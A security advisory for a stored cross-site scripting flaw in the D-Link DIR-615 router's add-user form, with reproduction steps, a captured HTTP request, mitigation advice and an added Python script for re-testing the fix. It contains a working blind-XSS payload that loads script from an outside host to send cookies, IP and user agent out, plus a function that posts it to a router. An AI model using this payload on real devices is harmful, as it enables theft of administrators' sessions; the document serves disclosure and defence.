Vendor: D-Link
Product: DIR-615 Wireless Router
Author: Sanyam Chawla
CVSS: 4.8 (Medium)
Vulnerability: Persistent Cross-Site Scripting
CWE: CWE-79
Affected Version From: T1
Affected Version To: T1
Patch Exists: YES
Related CVE: CVE-2019-19742
CPE: h:dlink:dir-615:20.07
Metasploit: none listed
Other Scripts: none listed
Platforms Tested: Windows 10, Kali Linux
Year: 2019

D-Link DIR-615 Wireless Router – Persistent Cross-Site Scripting

The D-Link DIR-615 Wireless Router (hardware revision T1, firmware 20.07) is vulnerable to persistent (stored) cross-site scripting. The username field of the add-user form on the Maintenance > Admin page (submitted to form2userconfig.cgi) is stored by the router without validation and later written into the user configuration page without HTML encoding. An authenticated administrator can therefore add a user whose name is a script tag such as "><script src=https://ptguy.xss.ht></script>; the leading "> breaks out of the surrounding markup and the external script is loaded every time the page is viewed, sending the viewer's IP address, cookies and user agent to the attacker-controlled host. The same lack of encoding allows plain HTML injection: a username of <b> Testing </b> is rendered in bold. Planting the payload requires admin credentials, but once stored it fires for anyone who later opens the page, which is what gives a low-privilege-looking bug persistence on the device.

Mitigation:

Update the DIR-615 firmware to a release that addresses CVE-2019-19742 (the vendor has published a fix). The underlying defect is missing output encoding: the stored username must be HTML-entity-encoded wherever it is written into the page, in both text and attribute contexts (so that " and ' are encoded as well as <, > and &). Restricting the characters accepted in the username field on submission is a useful second layer but is not a substitute for encoding on output. After updating, re-test by adding a user named <b> Testing </b> and confirming it is displayed literally rather than in bold.

Exploit-DB raw data:

# Exploit Title: D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting
# Date: 2019-12-13
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali Linux
# CVE: CVE-2019-19742

Reproduction Steps:
1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
2. Go to Maintenance page and click on Admin on the left panel
3. Put the blind XSS payload "><script src=https://ptguy.xss.ht></script> into the name field. This payload is saved by the server and reflected in the user page.
4. On every refresh of the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
5. For HTML injection, just put <b> Testing </b> in the username field; the username will be shown in bold on your homepage.

# Burp Intercept

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht%3E%3C%2Fscript%3E&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
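The following Python script is an added example for this page; it is not part of the Exploit-DB post and not D-Link's code. It rebuilds the form2userconfig.cgi body from the Burp capture above (so the percent-encoded payload can be compared byte for byte with the capture), and then contrasts two stand-in renderings of the stored username: one that interpolates it verbatim, as the router does, and one that HTML-encodes it with quotes included so the payload's leading "> cannot close a value attribute. The row template, TEMPLATE_TAGS, injected_tags(), classify_reflection() and send_add_user() are assumptions made for illustration; the real markup of userconfig.htm is not in the advisory.

```python
"""Added example: reproduce the add-user request from the Burp capture and
show why HTML-encoding the stored username on output defeats the payload.

Not from the Exploit-DB post or D-Link firmware. The row template below is a
constructed stand-in; the real markup of userconfig.htm is not in the advisory.
"""
import html
import re
import urllib.request
from urllib.parse import quote

GATEWAY = "http://192.168.0.1"  # default gateway used in the advisory
# Payloads quoted from the advisory (steps 3 and 5).
XSS_PAYLOAD = '"><script src=https://ptguy.xss.ht></script>'
HTML_PAYLOAD = "<b> Testing </b>"

# Tags the stand-in template emits on its own; anything else came from the username.
TEMPLATE_TAGS = {"tr", "td", "input"}
# Assumption: the router echoes each stored username both as text and inside a
# quoted value attribute. The leading "> in the payload closes that attribute.
ROW_TEMPLATE = '<tr><td>{name}</td><td><input type="hidden" name="user" value="{name}"></td></tr>'
TAG_NAME = re.compile(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)")


def build_add_user_body(username: str, password: str = "pentesting") -> str:
    """Rebuild the application/x-www-form-urlencoded body from the capture.

    Field names, order and fixed values are taken from the Burp request; only
    the username varies. quote(safe="") matches the capture's encoding of
    space as %20 and / as %2F (urlencode() would emit + for spaces).
    """
    fields = [
        ("username", username),
        ("privilege", "2"),
        ("newpass", password),
        ("confpass", password),
        ("adduser", "Add"),
        ("hiddenpass", ""),
        ("submit.htm?userconfig.htm", "Send"),
    ]
    return "&".join(f"{quote(k, safe='')}={quote(v, safe='')}" for k, v in fields)


def send_add_user(body: str, session_id: str, gateway: str = GATEWAY) -> str:
    """POST the body to form2userconfig.cgi as an authenticated admin.

    session_id is the SessionID cookie of a logged-in admin session (the
    capture shows the cookie name but not its value). Needs network access.
    """
    req = urllib.request.Request(
        f"{gateway}/form2userconfig.cgi",
        data=body.encode("ascii"),
        method="POST",
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer": f"{gateway}/userconfig.htm",
            "Cookie": f"SessionID={session_id}",
        },
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def render_row_unsafe(name: str) -> str:
    """Vulnerable rendering: the stored name is interpolated verbatim."""
    return ROW_TEMPLATE.format(name=name)


def render_row_safe(name: str) -> str:
    """Hardened rendering: entity-encode <, >, &, " and ' before interpolation.

    quote=True matters: with only < > & encoded, a name containing a raw
    double quote still closes the value="..." attribute and can inject
    further attributes into the input tag.
    """
    return ROW_TEMPLATE.format(name=html.escape(name, quote=True))


def injected_tags(rendered_html: str) -> set:
    """Tag names present in the rendered row that the template itself does not emit."""
    found = {m.group(1).lower() for m in TAG_NAME.finditer(rendered_html)}
    return found - TEMPLATE_TAGS


def classify_reflection(page_html: str, marker: str) -> str:
    """Post-patch check: how does the page reflect a probe username?

    'unencoded' means the fix is absent; 'encoded' or 'absent' is what fixed
    firmware should produce. Use a harmless marker such as HTML_PAYLOAD.
    """
    if marker in page_html:
        return "unencoded"
    if html.escape(marker, quote=True) in page_html or html.escape(marker, quote=False) in page_html:
        return "encoded"
    return "absent"


if __name__ == "__main__":
    print(build_add_user_body(XSS_PAYLOAD))
    for probe in (XSS_PAYLOAD, HTML_PAYLOAD):
        print("unsafe:", injected_tags(render_row_unsafe(probe)))
        print("safe:  ", injected_tags(render_row_safe(probe)))
```

classify_reflection() is the check to run after a firmware update: log in, add a user named <b> Testing </b>, fetch userconfig.htm and expect "encoded" or "absent", never "unencoded". send_add_user() needs a real SessionID from an authenticated admin login and is not exercised offline.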